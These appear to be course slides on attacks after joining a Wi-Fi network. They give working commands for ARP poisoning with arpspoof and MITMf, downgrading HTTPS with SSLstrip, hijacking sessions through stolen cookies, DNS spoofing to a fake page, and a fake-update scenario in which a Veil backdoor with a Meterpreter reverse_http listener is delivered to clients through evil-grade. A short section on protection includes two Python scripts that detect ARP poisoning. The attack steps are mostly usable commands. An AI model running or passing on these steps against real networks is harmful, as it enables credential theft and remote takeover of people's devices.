Post Connection Attacks
● All the attacks we carried out in the previous sections can be
done without knowing the key to the AP, i.e. without
connecting to the target network.
● We saw how we can control all the connections around us,
gather some information, sniff packets and crack
WEP/WPA/WPA2 keys.
● In this section we shall look at more sophisticated
attacks that can only be used after connecting to the target
AP.
Gathering Information
● In section 1 we saw how we can use airodump-ng to discover
all the APs around us and the clients associated with them.
● Now that we are connected to a specific AP, we can gather
more detailed info about the clients connected to this AP.
● There are a number of programs that can be used to do this;
we shall talk about 3 programs, starting with the simplest and
quickest one.
Netdiscover
Netdiscover is a program that can be used to discover the
clients connected to our current network. It is very quick, but it
does not show detailed information about the clients, only the IP, MAC
address and sometimes the hardware manufacturer of the
client's wireless card.
Usage:
netdiscover -i [INTERFACE] -r [RANGE]
ex: netdiscover -i wlan0 -r 192.168.1.1/24
Autoscan
Autoscan is another program that can be used to discover the
clients connected to our current network. It is not as quick as
Netdiscover, but it shows more detailed information about the
connected devices and it has a graphical user interface.
You can download Autoscan from:
http://autoscan-network.com/download/
Then open the directory where you extracted it and run
./AutoScan*.sh
Nmap
● Nmap is a network discovery tool that can be used to gather detailed
information about any client or network.
● We shall look at some of its uses to discover connected
clients and gather information about them.
● We are going to use Zenmap – the GUI for Nmap.
1. Ping scan: Very quick – only shows connected clients.
2. Quick scan plus: Quick – shows MAC and open ports.
3. Quick scan plus: Slower than the 2 above, more detailed info.
These are just sample scans; you can experiment with the scan
options and see the difference between them.
Man In The Middle Attacks
ARP Poisoning
This is one of the most dangerous and effective attacks that
can be used. It is used to redirect packets to and from any
client to our device, and since we have the network key, we can
read/modify/drop these packets. This allows us to launch very
powerful attacks.
It is very effective and dangerous because it is very hard to
protect against, as it exploits the insecure way that ARP
works.
ARP main security issues:
1. Each ARP request/response is trusted.
2. Clients can accept responses even if they did not send a
request.
● We can exploit these two issues
to redirect the flow of packets in
the network.
● We will first send an ARP response
to the client telling it that “I am the
router”; this is done by telling the
client that the device with the
router IP address has MY MAC
address.
ARP response to the client: IP: router IP, MAC: HACKER MAC (“I am the router”)
● Then we will send an ARP
response to the router, this time
telling it that “I am the client”; this
is done by telling the router that the
device with the client IP address
has MY MAC address.
ARP response to the router: IP: client IP, MAC: HACKER MAC (“I am the client”)
This means that the router thinks that I am the client, and the
client thinks that I am the router. So my device is in the middle
of the connection between the client and the router, i.e. every
packet that is going to/from the client will have to go through
my device first.
arpspoof
Arpspoof is a tool that is part of a suite called dsniff, which contains a number of network
penetration tools. Arpspoof can be used to launch a MITM attack and redirect
traffic to flow through our device.
1. Tell the target client that I am the router.
arpspoof -i [interface] -t [Target IP] [AP IP]
Ex: arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1
2. Tell the AP that I am the target client.
arpspoof -i [interface] -t [AP IP] [Target IP]
Ex: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5
3. Enable IP forward to allow packets to flow through our device without being dropped.
echo 1 > /proc/sys/net/ipv4/ip_forward
ARP Poisoning - MITMf
MITMf is a framework that allows us to launch a number of MITM attacks.
MITMf also starts SSLstrip automatically to bypass HTTPS/SSL.
mitmf --arp --spoof --gateway [GATEWAY IP] --targets [TARGET IPs]
Ex: mitmf --arp --spoof --gateway 10.20.14.1 --targets 10.20.14.206
echo 1 > /proc/sys/net/ipv4/ip_forward
MITM – bypassing HTTPS
Most websites use HTTPS on their login pages. This means that these pages are
validated using an SSL certificate, and therefore intercepting them will show a warning to the user
that the certificate is invalid.
SSLstrip is a tool that can be used to downgrade HTTPS requests to HTTP,
allowing us to sniff passwords without displaying a warning to the user.
Luckily MITMf starts SSLstrip for us automatically.
Session Hijacking
What if the user uses the “remember me” feature?
If the user uses this feature, the authentication happens
using the cookies and not the username and password. So
instead of sniffing the password we can sniff the cookies
and inject them into our browser; this will allow us to log in to
the user's account without using the password.
apt-get install ferret-sidejack
hamster
ferret -i [INTERFACE]
MITM – DNS Spoofing
DNS spoofing allows us to redirect any request to a certain domain to
another domain; for example, we can redirect any request from live.com to a
fake page!
1. Edit dns settings
> leafpad /etc/mitmf/mitmf.conf
2. Run ettercap to arp poison the target(s) and enable the dns_spoof plugin.
mitmf --arp --spoof --gateway [GATEWAY IP] --targets [TARGET IP] -i eth0 --dns
Ex: mitmf --arp --spoof --gateway 10.20.14.1 --targets 10.20.14.206 -i eth0 --dns
MITM
Wireshark
● Wireshark is a network protocol analyser that is designed to
help network administrators to keep track of what is
happening in their network and analyse all the packets.
● Can be used whenever we are the MITM, after ARP
spoofing or after starting a fake AP.
● Wireshark logs each packet that flows through the selected
interface.
Usage:
> wireshark
Protecting against MITM attacks
● It is very difficult to protect against MITM attacks; this is due to the fact
that they exploit the insecure way that ARP works.
● Using static ARP tables can protect against MITM attacks, but it is not
practical in large networks. Even in small networks you have to
configure ARP tables every time a new device connects to your
network.
● We can discover ARP poisoning easily just by looking at our ARP
tables.
● If the MAC address of the router changes then we have been
poisoned.
> arp -a
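The manual check above (look at `arp -a` and see whether the router's MAC has changed) can be automated. The following Python sketch is an added example, not part of the original slides; it assumes Linux/macOS-style `arp -a` output, and the addresses, the baseline MAC and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Matches rows such as: "? (192.168.1.1) at 00:11:22:33:44:55 [ether] on wlan0"
ARP_ROW = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+"
    r"(?P<mac>(?:[0-9A-Fa-f]{1,2}[:-]){5}[0-9A-Fa-f]{1,2})"
)


def normalize_mac(mac):
    """Lower-case, colon-separated, zero-padded (macOS prints 'a:b:c:...')."""
    return ":".join(f"{int(part, 16):02x}" for part in re.split("[:-]", mac))


def parse_arp_table(text):
    """Return {ip: mac} for complete entries; '<incomplete>' rows are skipped."""
    table = {}
    for line in text.splitlines():
        m = ARP_ROW.search(line)
        if m:
            table[m["ip"]] = normalize_mac(m["mac"])
    return table


def check_snapshot(table, gateway_ip, baseline_gateway_mac):
    """Compare one ARP table snapshot against the known-good gateway MAC."""
    findings = []
    seen = table.get(gateway_ip)
    if seen is not None and seen != normalize_mac(baseline_gateway_mac):
        findings.append(("gateway-mac-changed", gateway_ip, seen))
    # If the poisoning host is also in our table under its real IP, the same
    # MAC shows up twice, which points at the machine sending the replies.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1 and gateway_ip in ips:
            findings.append(("mac-shared-with-gateway", mac, sorted(ips)))
    return findings


# Constructed sample data (not taken from a real network).
GATEWAY_IP = "192.168.1.1"
BASELINE_MAC = "00:11:22:33:44:55"   # recorded while the network was known-good

CLEAN = """\
_gateway (192.168.1.1) at 00:11:22:33:44:55 [ether] on wlan0
? (192.168.1.5) at 66:77:88:99:aa:bb [ether] on wlan0
? (192.168.1.7) at de:ad:be:ef:00:07 [ether] on wlan0
? (192.168.1.9) at <incomplete> on wlan0
"""

POISONED = CLEAN.replace(
    "(192.168.1.1) at 00:11:22:33:44:55", "(192.168.1.1) at de:ad:be:ef:00:07"
)

if __name__ == "__main__":
    for name, snapshot in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, check_snapshot(parse_arp_table(snapshot), GATEWAY_IP, BASELINE_MAC))
```

The baseline MAC has to be recorded out of band (for example from the router's label or admin page), otherwise a table that is already poisoned becomes the reference.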
Protecting against MITM attacks
● There are also tools that monitor our ARP table
automatically and notify us if anything suspicious
happens.
● And we can use Wireshark to detect ARP poisoning and other
suspicious activities in the network.
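Monitoring of this kind comes down to watching for the two ARP weaknesses listed earlier: replies that nobody asked for, and an IP address whose MAC suddenly changes. The following Python sketch is an added example, not part of the original slides, that applies this logic to raw 28-byte ARP payloads such as those exported from a capture; the `ArpWatch` class, the 2-second window and the hex samples are assumptions constructed for illustration.

```python
import socket
import struct

ARP_FMT = "!HHBBH6s4s6s4s"   # Ethernet/IPv4 ARP payload, 28 bytes
REQUEST, REPLY = 1, 2


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_arp(payload):
    """Decode an ARP payload into (oper, sender_mac, sender_ip, target_mac, target_ip)."""
    size = struct.calcsize(ARP_FMT)
    if len(payload) < size:
        raise ValueError("truncated ARP payload")
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(
        ARP_FMT, payload[:size])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not Ethernet/IPv4 ARP")
    return oper, mac_str(sha), socket.inet_ntoa(spa), mac_str(tha), socket.inet_ntoa(tpa)


class ArpWatch:
    """Hypothetical passive monitor: feed it every ARP payload seen on the LAN."""

    def __init__(self, request_window=2.0):
        self.window = request_window
        self.pending = {}    # (asker_ip, wanted_ip) -> time of the request
        self.bindings = {}   # ip -> first MAC seen for it

    def observe(self, ts, payload):
        oper, sha, spa, _tha, tpa = parse_arp(payload)
        alerts = []
        if oper == REQUEST:
            self.pending[(spa, tpa)] = ts
        elif oper == REPLY and spa != tpa:   # spa == tpa is a gratuitous ARP
            asked = self.pending.pop((tpa, spa), None)
            if asked is None or ts - asked > self.window:
                alerts.append(("unsolicited-reply", spa, sha))
        if spa != "0.0.0.0":                 # ARP probes carry no sender IP
            known = self.bindings.setdefault(spa, sha)
            if known != sha:
                # The first binding is kept, so a legitimate re-address
                # (new NIC, DHCP reuse) keeps alerting until the state is reset.
                alerts.append(("binding-changed", spa, known, sha))
        return alerts


def scan(trace, window=2.0):
    """Run a list of (timestamp, hex payload) through a fresh ArpWatch."""
    watch = ArpWatch(window)
    return [(ts, alert) for ts, hexpayload in trace
            for alert in watch.observe(ts, bytes.fromhex(hexpayload))]


# Constructed trace: router .1 = 00:11:22:33:44:55, client .5 = 66:77:88:99:aa:bb,
# third host = de:ad:be:ef:00:07. Fields: header+oper, sha, spa, tha, tpa.
HDR_REQ, HDR_REP = "0001080006040001", "0001080006040002"
TRACE = [
    (0.000, HDR_REQ + "66778899aabb" + "c0a80105" + "000000000000" + "c0a80101"),
    (0.001, HDR_REP + "001122334455" + "c0a80101" + "66778899aabb" + "c0a80105"),
    (5.000, HDR_REP + "deadbeef0007" + "c0a80101" + "66778899aabb" + "c0a80105"),
    (5.100, HDR_REP + "deadbeef0007" + "c0a80105" + "001122334455" + "c0a80101"),
]

if __name__ == "__main__":
    for ts, alert in scan(TRACE):
        print(ts, alert)
```

The first two packets are a normal request and answer and raise nothing; the last two are replies with no matching request that rebind both the router's and the client's IP to the same third MAC.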
Scenario 2
Hacking clients using a fake update
1. Create a backdoor.
> apt-get install veil-evasion #to install veil-evasion
> veil-evasion
> use 8
> set LHOST [YOUR IP]
> generate
2. Listen for connections from your backdoor.
> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_http
> set LPORT 5555
> set LHOST [YOUR IP]
> exploit
Hacking clients using a fake update
Using a tool called evil-grade, we can create fake updates and
spoof the URL that the target program uses to check for updates
and get it to redirect to our machine, where we have evil-grade
running. The target program will tell the user that there is a new
update available, and when the user agrees to install the new
update we will gain full access to their device.
Wi-fEye
Wi-fEye is a program written in Python, designed to help carry
out all the attacks that we explained automatically.
1. Download it from:
http://wi-feye.isecur1ty.org/download.php
Then you need to extract the archive, and run the following
command inside its directory:
> python install.py
Now you are ready to go!
> python Wi-fEye.py
